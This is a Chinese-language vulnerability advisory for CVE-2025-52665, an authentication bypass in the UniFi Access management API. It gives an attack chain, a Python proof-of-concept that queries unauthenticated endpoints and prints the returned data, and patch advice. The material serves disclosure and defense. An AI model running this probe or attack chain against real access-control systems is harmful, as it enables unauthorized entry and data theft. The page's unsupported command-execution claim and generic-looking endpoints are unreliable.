CVE-2025-52665: UniFi Access 认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-52665

漏洞类型

认证绕过

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UniFi Access Application

漏洞概述

CVE-2025-52665是Ubiquiti公司UniFi门禁系统中的一个严重安全漏洞，CVSS评分达到满分10.0。该漏洞允许具有管理网络访问权限的恶意攻击者利用UniFi Access应用程序中的错误配置，访问暴露且未进行适当身份验证的管理API。此漏洞由HackerOne平台的安全研究人员发现并报告。由于无需任何认证即可访问敏感的管理接口，攻击者可以完全控制整个门禁系统，包括门锁状态、用户权限、访问记录等敏感数据。此漏洞影响范围广泛，对使用UniFi门禁解决方案的企业和机构构成严重威胁。

技术细节

该漏洞的根本原因是UniFi Access应用程序在特定版本中错误配置了管理API的访问控制机制。在受影响的版本中，管理API端点直接暴露在网络上，且未实施任何身份验证或访问控制。攻击者只需能够访问管理网络，无需任何凭证即可向API发送请求。攻击者可以通过该API执行以下操作：1) 读取和修改门禁系统配置；2) 管理用户账户和访问权限；3) 控制门锁的开关状态；4) 获取访问日志和监控数据。由于API采用RESTful架构，攻击者可以使用标准的HTTP请求工具（如curl或Python requests）进行利用。此外，攻击者还可以通过该漏洞在系统上执行任意命令，实现对宿主机的完全控制。

攻击链分析

STEP 1

步骤1

攻击者获得管理网络的访问权限，可以是内部网络访问或通过VPN等方式

STEP 2

步骤2

攻击者识别运行受影响版本UniFi Access Application的目标系统（版本3.3.22-3.4.31）

STEP 3

步骤3

攻击者直接向暴露的管理API端点发送HTTP请求，无需任何认证凭证

STEP 4

步骤4

通过/api/users、/api/devices等端点枚举系统用户、设备和配置信息

STEP 5

步骤5

利用API功能修改门锁状态、解锁门禁或创建新用户账户

STEP 6

步骤6

获取敏感访问日志和监控数据，或进一步利用获取的访问权限进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-52665 PoC - UniFi Access Authentication Bypass
# Target: UniFi Access Application (Version 3.3.22 - 3.4.31)
# Note: This PoC is for authorized security testing only

TARGET_IP = "target_ip"
PORT = 8443
BASE_URL = f"https://{TARGET_IP}:{PORT}"

def check_vulnerability():
    """Check if target is vulnerable by accessing the management API"""
    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'UniFi Access Manager'
    }
    
    # Try to access user management endpoint without authentication
    endpoints = [
        '/api/users',
        '/api/devices',
        '/api/access-points',
        '/api/settings'
    ]
    
    for endpoint in endpoints:
        try:
            response = requests.get(
                f"{BASE_URL}{endpoint}",
                headers=headers,
                verify=False,
                timeout=10
            )
            if response.status_code == 200:
                print(f"[+] Vulnerable! Endpoint {endpoint} is accessible without auth")
                print(f"[+] Response: {response.text[:500]}")
                return True
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    
    return False

def get_system_info():
    """Gather system information if vulnerable"""
    try:
        response = requests.get(
            f"{BASE_URL}/api/system/info",
            verify=False,
            timeout=10
        )
        if response.status_code == 200:
            return response.json()
    except:
        pass
    return None

if __name__ == "__main__":
    print("CVE-2025-52665 PoC - UniFi Access Auth Bypass")
    print("=" * 50)
    if check_vulnerability():
        print("[!] Target is VULNERABLE to CVE-2025-52665")
        info = get_system_info()
        if info:
            print(f"[+] System Info: {json.dumps(info, indent=2)}")
    else:
        print("[-] Target appears to be patched or not UniFi Access")

影响范围

UniFi Access Application 3.3.22

UniFi Access Application 3.3.x

UniFi Access Application 3.4.x (through 3.4.31)

防御指南

临时缓解措施

将UniFi Access Application升级到版本4.0.21或更高版本，该版本已修复API认证绕过问题。在升级前，建议通过网络隔离和访问控制策略限制对管理接口的暴露，仅允许授权的管理终端访问。